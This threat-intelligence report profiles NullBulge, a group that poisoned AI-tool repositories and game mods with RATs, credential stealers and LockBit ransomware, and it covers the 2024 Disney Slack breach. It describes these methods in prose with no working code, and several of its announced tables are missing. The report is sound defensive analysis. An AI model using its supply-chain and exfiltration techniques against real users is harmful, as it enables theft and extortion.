Between April and June 2024, a new cybercriminal threat actor, tracked as NullBulge, emerged as an impactful threat targeting communities at the intersection of artificial intelligence (AI) development and gaming. The group cultivated a public-facing persona of a “hacktivist” collective, claiming to be motivated by a pro-artist, anti-AI ideology promoted on social media platforms such as X and 4chan. However, analysis of their activities reveals this facade to be a smokescreen for conventional, financially driven criminal operations.

NullBulge’s core operational strategy revolves around software supply chain attacks, a technique often described as “poisoning the well.” They compromise trusted software distribution channels, such as public code repositories on GitHub and Hugging Face, and distribute trojanized video game modifications to infect their targets. Initial access is typically achieved through the deployment of commodity Remote Access Trojans (RATs), primarily AsyncRAT and XWorm. These RATs serve as a foothold for subsequent data theft and the eventual deployment of customized LockBit 3.0 ransomware payloads, which are built using the leaked “LockBit Black” builder.

The group gained significant notoriety in July 2024 following a high-profile data breach targeting The Walt Disney Company. In this incident, NullBulge successfully exfiltrated over a terabyte of sensitive internal data from the company’s Slack environment, which they subsequently leaked publicly. This attack, initiated by compromising an employee’s personal device, highlights the significant risks posed by the blurring boundaries between personal and corporate computing environments.

This report provides a comprehensive analysis of NullBulge, deconstructing their identity, motivations, and operational playbook. It concludes that NullBulge exemplifies a growing trend of low-to-mid-sophistication cybercriminals who leverage ideological causes and creative social engineering within niche online communities to mask and facilitate profit-oriented attacks. Their threat lies not in advanced technical capabilities, but in their opportunistic exploitation of trust and their effective use of readily available malicious tools.

Threat Actor Profile: Identity, Motivation, and Attribution

Origins and Online Presence

NullBulge became active in the spring of 2024, with most public activity observed between May and June of that year. The group rapidly established a multifaceted online presence across both clearnet and underground platforms to promote their brand, distribute malware, and leak stolen data. They operate under several known aliases, with NullBulge Group being their primary identifier. Their malware distribution campaigns are heavily associated with the developer personas AppleBotzz and BeamerNGz. The AppleBotzz identity, which had a presence on GitHub and various modding websites, was either a legitimate developer whose accounts were compromised and subsequently co-opted by NullBulge, or a purpose-built persona created by the group from the outset to serve as a trusted vehicle for malware delivery.

The group maintains a carefully curated public presence to project its hacktivist image. This includes an active account on X (formerly Twitter) under the handle @nullbulgegroup and a presence on 4chan, where they post under the tripcode !!z694g7GKz7l to announce their activities. For their more illicit operations, they utilize underground forums such as BreachForums for data leak announcements and cracked.io for selling stolen assets. They have also been observed using the e-commerce platform Sellix under the name NullBulgeGroup to monetize stolen data directly. A unique and notable aspect of their branding is their self-identification as a “furry hacktivist group,” an unusual cultural signifier that likely serves to generate media attention and create a distinct, memorable identity within the crowded threat landscape.

Deconstructing the “Hacktivist” Motivation

NullBulge’s public communications are built around a central, ideological claim: they are hacktivists dedicated to “protecting artists’ rights and ensuring fair compensation for their work”. They position themselves as adversaries of AI-generated art, which they believe harms the creative industry, and also claim to be anti-cryptocurrency. Their data leak site (DLS) even features a mission statement outlining the “sins” that would make an entity a target, including the promotion of AI art or crypto-related products.

Despite this carefully crafted narrative, a significant body of evidence points to their true motivation being financial gain. The hacktivist persona appears to be a calculated psychological operation. A generic cybercrime group is easily categorized and dismissed, whereas a group with a peculiar and seemingly ideological identity generates media intrigue and public confusion. This confusion serves as an effective smokescreen, diverting attention from their conventional criminal activities and toward their purported “cause.” By tapping into a genuine cultural debate surrounding AI and art, they create a veneer of moral justification that complicates public perception and amplifies the psychological impact of their attacks.

The evidence contradicting their hacktivist claims is definitive:

• Sale of Stolen Data: The group has a documented history of selling infostealer logs harvested from a custom stealer on the cracked.io underground forum.
• Sale of API Keys: They have been observed selling stolen OpenAI API keys on both underground forums and their Sellix profile, a purely profit-driven activity.
• Use of Ransomware: Their deployment of LockBit 3.0 ransomware is the most compelling evidence of their financial focus. Ransomware is a tool of extortion, fundamentally incompatible with a purely ideological hacktivist mission.
• Cryptocurrency Wallet: The group maintains and publishes a Monero (XMR) wallet address for payments, directly contradicting their anti-crypto stance and confirming their use of cryptocurrency for financial transactions. The address is 45i7kjWZuzJ4PdSbandaaE8S6mQATmneTYEpgsaaCqDmc7foEJDXwxd3ABR8bn6YE4c7hZ2dYEEr1CwG48gAknPL6zUpYyV.

Attribution and Skill Assessment

NullBulge has claimed to be of Russian origin, a common tactic used by threat actors to imply they are beyond the reach of Western law enforcement. However, this claim is disputed by security researchers who have noted that the syntax and grammar used in their English-language communications, particularly on their X feed, are more consistent with that of a native English speaker. The Russian origin claim is therefore assessed with low confidence and is likely a deliberate misdirection.

From a technical perspective, NullBulge is assessed as a low-skilled but highly creative and opportunistic threat actor. Their operational model represents a form of “democratized” cybercrime, where access to leaked tools and a keen understanding of social dynamics can substitute for advanced technical capabilities. The group does not appear to develop its own sophisticated malware from scratch. Instead, they rely on readily available commodity malware like AsyncRAT and XWorm and leverage the leaked LockBit 3.0 builder for their ransomware operations. This reliance on off-the-shelf tools significantly lowers the barrier to entry for conducting impactful attacks. Their primary innovation lies not in code, but in their distribution strategy. By targeting niche communities of AI developers and gamers—where trust in shared code is high and security practices can be inconsistent—they have found a fertile ground for their attacks. Their choice to operate their own DLS and social media profiles, rather than working as an affiliate for an established Ransomware-as-a-Service (RaaS) operation like LockBit, further indicates their status as an independent, albeit less sophisticated, entity.

Victimology and Targeting Strategy

NullBulge’s targeting strategy is highly focused, concentrating on communities where their “poisoning the well” approach is most effective. Their choice of victims reflects a deep understanding of how to exploit the trust inherent in open-source and collaborative online environments.

Primary Target Demographics

The group’s campaigns are primarily directed at two overlapping demographics:

• AI-Centric Communities: This includes developers, researchers, hobbyists, and end-users of AI tools and platforms. They have shown a particular interest in the generative AI space, targeting users of applications like Stable Diffusion and ComfyUI.
• Gaming Communities: The group has specifically targeted the modding community for the vehicle simulation game Beam.NG. This community is characterized by the frequent downloading and sharing of user-created modifications, making it an ideal vector for malware distribution.

The rationale for this targeting is clear: both of these communities actively encourage the downloading and execution of code from semi-trusted public sources like GitHub, Hugging Face, and mod-hosting websites. This behavior creates a perfect attack surface for NullBulge’s methods, allowing them to disguise their malicious payloads as legitimate and desirable software enhancements.

Known and Claimed Corporate & Individual Victims

While their initial campaigns focused on widespread infection of individuals within their target demographics, NullBulge has also claimed responsibility for several targeted corporate breaches.

• The Walt Disney Company: Their most significant and widely publicized victim. The breach, which occurred in July 2024, was achieved by compromising a single employee and led to a massive data leak.
• A U.S.-based Non-Profit: The group has listed a non-profit organization in the United States on its DLS, though details of this breach are scarce.
• An AI and Cryptocurrency-related Company: In a clear contradiction of their stated ideology, NullBulge claims to have breached a company involved in both AI and cryptocurrency, reinforcing the assessment that their motivations are financial.
• An Individual Streamer based in India: This claimed victim demonstrates that the group’s targeting is not limited to corporate entities and that they are willing to attack individuals for potential financial gain or notoriety.
• Developer “AppleBotzz”: The individual or entity behind the AppleBotzz developer persona can be considered the group’s foundational victim, as the co-opting of this identity was central to their initial malware distribution campaigns.

The group’s targeting strategy is a textbook example of “island hopping,” a tactic where an attacker compromises a less-secure peripheral target to gain access to a more valuable, well-defended one. Attacking Disney’s hardened corporate perimeter directly would likely be beyond NullBulge’s capabilities. It was far easier to target a Disney developer through their personal interests, such as gaming or AI experimentation on a personal computer. Once the employee’s less-secure personal device was compromised via a malicious game mod or AI tool, the attackers could harvest stored corporate credentials or active session tokens. This allowed them to pivot, or “hop,” from the low-security island of the personal machine to the high-value target of Disney’s internal corporate network. This case vividly demonstrates a critical modern threat vector: the security risks arising from the dissolution of the traditional network perimeter.

Operational Analysis: Anatomy of an Attack (TTPs)

NullBulge’s attacks follow a consistent and observable pattern, relying on social engineering and supply chain abuse for initial access, followed by the use of commodity malware for persistence and payload delivery. Their TTPs can be broken down across the cyber attack lifecycle.

Initial Access: “Poisoning the Well” in Trusted Repositories

NullBulge’s primary method for gaining initial access is by compromising the software supply chain of their target communities.

• Trojanized Game Modifications: The group has been highly active in the Beam.NG modding community. Their method involves embedding malicious Lua scripts, often named versioncheck.lua, within otherwise functional game mods. These scripts contain Base64-encoded PowerShell commands. When a user installs and runs the mod, the game engine executes the Lua script, which in turn decodes and runs the PowerShell payload. This payload typically uses the Invoke-WebRequest cmdlet to download the next stage of the malware from a hosting site like GitHub or pixeldrain.
• Software Supply Chain Compromise (AI Tooling): For their AI-focused targets, NullBulge compromises extensions and packages hosted on platforms like GitHub and Hugging Face. Specific examples include the trojanizing of the ComfyUI_LLMVISION extension and the creation of malicious tools like “SillyTavern Character Generator”. Their technique often involves leaving the primary source code of the tool intact to avoid suspicion. Instead, they modify the requirements.txt file, which specifies the project’s dependencies. This file is altered to point to a malicious version of a legitimate library, such as those for OpenAI or Anthropic. To evade detection, the malicious package version is often only a minor increment higher than the official one (e.g., openai-1.16.3 instead of the legitimate 1.16.2), tricking automated package managers into downloading it. These malicious Python wheel (.whl) files contain their info-stealing payloads.

Execution and Payload Delivery

Once the initial access vector is triggered, the downloaded script executes a second-stage payload. These payloads are consistently commodity RATs, which grant the attackers persistent remote control over the victim’s machine. The two primary RATs used by NullBulge are AsyncRAT and XWorm. In one observed campaign targeting Beam.NG users, the AsyncRAT payload was downloaded from pixeldrain.com and executed under the process name BeamNG.UI.exe to blend in with legitimate game processes.

Credential Access and Data Harvesting

After establishing persistence with a RAT, NullBulge deploys custom Python-based info-stealers to harvest sensitive data. These stealers are often bundled within the malicious Python libraries used in their supply chain attacks.

• Browser Credential Theft: Scripts like Fadmino.py are designed to target and exfiltrate data from web browsers, including cookies, saved passwords, and session data. They achieve this by accessing the local Network Security Services (NSS) databases used by Firefox and Chrome-based browsers.
• Comprehensive System Profiling: Other scripts, such as admin.py and cadmino.py, expand the scope of data collection. They gather detailed system information, geographic location data (based on IP address), lists of installed applications and security products, and financial data stored on the system.
• API Key Theft: A primary goal of their AI-tool-focused attacks is the theft of API keys. The malicious libraries are coded to specifically search for and exfiltrate API keys for services like OpenAI and Anthropic as soon as they are loaded by the host application.

Exfiltration and Command & Control (C2)

For data exfiltration and C2, NullBulge employs a simple yet effective technique: Discord webhooks. The Python stealer scripts aggregate all the harvested data and transmit it via HTTP POST requests to a hardcoded Discord webhook URL. This method is advantageous for a low-skilled actor as it requires no dedicated C2 server infrastructure and the traffic can easily blend with legitimate web traffic to evade basic network security controls.

Impact and Monetization

The final stage of a NullBulge attack is monetization, primarily achieved through ransomware and data extortion.

• Ransomware Deployment: As a final payload, delivered via the established RAT access, NullBulge deploys a customized version of LockBit 3.0 (also known as LockBit Black) ransomware.
• Tooling and Configuration: They utilize the complete leaked LockBit 3.0 builder package, including builder.exe, keygen.exe, and build.bat. While the builder tools themselves are unmodified, NullBulge customizes the config.json file to tailor the ransomware’s behavior. Their typical configuration enables the encryption of both local volumes and accessible network shares, uses the “auto” encryption mode for speed, and is set to self-delete after execution to hinder forensic analysis. A notable feature they enable is the ability to send the ransom note to all attached printers, a classic LockBit tactic designed to maximize the victim’s awareness of the attack.
• Double Extortion and Data Leak Sites (DLS): Following modern ransomware trends, NullBulge practices double extortion. Before encrypting files, they exfiltrate sensitive data. This data is then used as leverage, with the threat of public release if the ransom is not paid. To facilitate this, they operate multiple DLS domains, including nullbulge[.]com, nullbulge[.]se, nullbulge[.]co, and a Tor-based onion site.

Malware & Tooling Arsenal

The following table provides a consolidated view of the tools employed by NullBulge and their function within the attack chain.

Case Study: The July 2024 Disney Breach

The data breach of The Walt Disney Company in July 2024 was the event that propelled NullBulge from a niche threat into the global spotlight. A detailed reconstruction of this incident serves as a critical case study on the risks of supply chain attacks and the erosion of the network perimeter.

Attack Timeline and Vector Reconstruction

The attack unfolded over several stages, likely beginning weeks or months before the public disclosure.

• Initial Compromise: The entry point was not Disney’s corporate network, but the personal computer of a technical lead employed by the company. This employee, on their unmanaged personal device, downloaded and installed a malicious software package created by NullBulge. The evidence points to one of two vectors: either a trojanized modification for the game Beam.NG or the malicious ComfyUI_LLMVISION AI tool extension.
• Credential Theft: Once executed on the employee’s machine, NullBulge’s info-stealing malware harvested a wide range of sensitive credentials. The most critical of these were credentials for the employee’s password manager and, crucially, active session tokens or cookies for their corporate Slack account.
• Access and Exfiltration: Armed with these stolen credentials, NullBulge was able to bypass Disney’s perimeter defenses and log into the corporate Slack environment, effectively impersonating the employee. The compromised employee account had exceptionally broad access permissions, with visibility into nearly 10,000 internal Slack channels. The attackers then proceeded to systematically scrape and exfiltrate an enormous volume of data, estimated to be between 1.1 and 1.2 TB.
• Public Leak: On July 12, 2024, NullBulge publicly announced the breach on underground forums like BreachForums and began leaking the stolen data via their DLS. They notably chose to leak the data immediately rather than attempting to privately ransom Disney, a decision that aligns with their public hacktivist persona but may also have been a recognition that a company of Disney’s scale would be unlikely to pay.

Deconstructing the “Insider Threat” Narrative

In their public communications, NullBulge heavily promoted the idea that they were aided by a malicious insider. They claimed to have an “inside man” who eventually “got cold feet and kicked us out”. To lend credence to this story, they doxxed the compromised employee, leaking an extensive amount of their personally identifiable information (PII), including their Social Security number, banking information, and data from their password manager.

However, a technical analysis of the incident suggests the “insider threat” narrative was likely a fabrication. This narrative served to amplify the psychological impact of the breach, sow distrust and chaos within Disney, and deflect from the less sensational reality of the attack vector. The available evidence strongly supports a scenario where a standard remote compromise of an employee’s poorly secured personal device led to the theft of corporate credentials. The subsequent doxxing of the employee was not proof of their collusion, but rather a punitive and intimidating act against the individual whose account they had successfully compromised. This fits the group’s pattern of framing their actions as “payback”.

Analysis of Exfiltrated Data

The data exfiltrated from Disney’s Slack environment was extensive and highly sensitive. The dump contained years of internal communications, files, source code snippets, details of unreleased projects, links to internal APIs and web pages, some login credentials, and employee PII. Publicly reviewed portions of the leak included conversations related to the maintenance of corporate websites, ongoing software development projects, and internal employee programs.

The impact on Disney was severe. The breach resulted in the exposure of significant intellectual property and internal operational secrets. The leaked credentials and API keys created an immediate and ongoing security risk, requiring a massive incident response effort. In the aftermath, Disney announced its intention to migrate its internal communications from Slack to Microsoft Teams, a move that some analysts have suggested may be more about shifting blame for the incident than implementing a fundamentally more secure solution.

This breach serves as a seminal case study on the catastrophic risk posed by the dissolution of the traditional network perimeter. The attack did not exploit a vulnerability in Slack’s platform or Disney’s core infrastructure. Instead, the point of failure was the intersection of an employee’s personal and professional digital lives. The incident demonstrates that robust perimeter security is insufficient when an attacker can simply steal the keys to the kingdom from an employee’s unmanaged and insecure personal device. It highlights a critical defensive gap for modern organizations: the need for Zero Trust security models that can enforce authentication and device posture checks for every access request to corporate SaaS applications, regardless of its origin.

Defensive Mitigations and Strategic Recommendations

Defending against a threat actor like NullBulge requires a multi-layered approach that combines strategic policy changes with tactical security controls. The focus should be on securing the software supply chain and implementing a Zero Trust security posture to mitigate risks from compromised personal devices.

Strategic Recommendations (For Leadership)

• Secure the Software Supply Chain: Organizations, particularly those with software development teams, must implement rigorous policies for vetting third-party code. This should include mandatory security scanning of all open-source libraries and dependencies before they are integrated into development pipelines. A formal code review process for any external components should be enforced to identify suspicious modifications, such as altered dependency files.
• Developer Security Awareness Training: Developers are a primary target for actors like NullBulge. Organizations should conduct targeted security training that specifically addresses the risks of trojanized development tools, dependency confusion attacks, and the critical importance of maintaining a secure separation between personal and professional development environments.
• Embrace a Zero Trust Architecture: The Disney breach underscores the inadequacy of perimeter-based security models. Organizations should accelerate the adoption of a Zero Trust architecture. For critical SaaS applications like Slack, this means that no user or device is trusted by default. Every access attempt must be verified through strong multi-factor authentication (MFA), and access should be conditional based on device health and posture checks. This prevents stolen credentials from being the sole key needed for access.

Tactical Mitigations (For Security Teams)

• Application Allowlisting: Implementing application allowlisting is a highly effective control against the initial stages of a NullBulge attack. By only permitting approved applications to run, the execution of unauthorized malware droppers downloaded by game mods or malicious libraries can be blocked by default.
• PowerShell Hardening and Monitoring: Given NullBulge’s use of encoded PowerShell commands, PowerShell execution should be constrained on endpoints where it is not required for administrative tasks. For all other systems, enhanced PowerShell logging (including script block and module logging) should be enabled and forwarded to a SIEM to detect the execution of obfuscated or suspicious commands.
• Egress Traffic Filtering and Monitoring: NullBulge relies on outbound connections to Discord for C2 and data exfiltration. Organizations should monitor for and consider blocking outbound web traffic to Discord and similar services from corporate assets, especially servers and developer workstations, where such traffic is not expected.
• Endpoint Detection and Response (EDR): A robust EDR solution is critical for detecting the behavioral anomalies associated with a NullBulge infection. EDR tools can identify suspicious process chains (e.g., a game process spawning PowerShell), unauthorized access to browser credential stores, and the execution of known RATs.
• Secure API Key and Secrets Management: Developers should be mandated to use secure enterprise vaults for storing and managing API keys and other secrets. Secrets should never be hardcoded in source code or stored in plaintext files on developer workstations, where they can be easily harvested by info-stealers.

Indicators of Compromise (IOCs)

The following table contains a comprehensive list of known technical indicators associated with NullBulge activity. These IOCs can be used for threat hunting, detection rule creation, and incident response.

MITRE ATT&CK® Mapping

The following table maps the observed Tactics, Techniques, and Procedures (TTPs) of NullBulge to the MITRE ATT&CK® framework for Enterprise. This mapping can be used to assess defensive coverage and guide threat hunting activities.